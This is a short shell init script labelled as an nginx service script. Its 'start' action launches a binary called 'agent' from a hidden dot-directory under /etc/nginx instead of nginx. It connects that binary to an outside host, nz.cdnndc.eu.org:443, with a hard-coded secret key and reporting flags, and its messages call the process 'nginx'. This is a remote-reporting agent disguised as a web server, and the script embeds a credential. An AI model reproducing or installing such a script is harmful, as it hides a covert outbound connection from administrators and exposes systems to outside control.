#! /bin/sh
NGINX_BIN='/etc/nginx/locations.d/.nz/agent'
CONFIG='/usr/local/nginx/conf/nginx.conf'

case "$1" in
    start)
        echo -n "Starting nginx... "

        PID=$(ps -ef | grep "$NGINX_BIN" | grep -v grep | awk '{print $2}')
        if [ "$PID" != "" ]; then
            echo "nginx (pid $PID) already running."
            exit 1
        fi

        $NGINX_BIN /etc/nginx/locations.d/.nz/agent -s nz.cdnndc.eu.org:443 -p tq4m2xFy58PBHwYT8v --report-delay 4 --skip-conn --skip-procs 

        if [ "$?" != 0 ]; then
            echo " failed"
            exit 1
        else
            echo " done"
        fi
        ;;
    *)
        echo "Usage: $0 {start|stop|restart|reload|status|configtest|force-quit|kill}"
        exit 1
        ;;
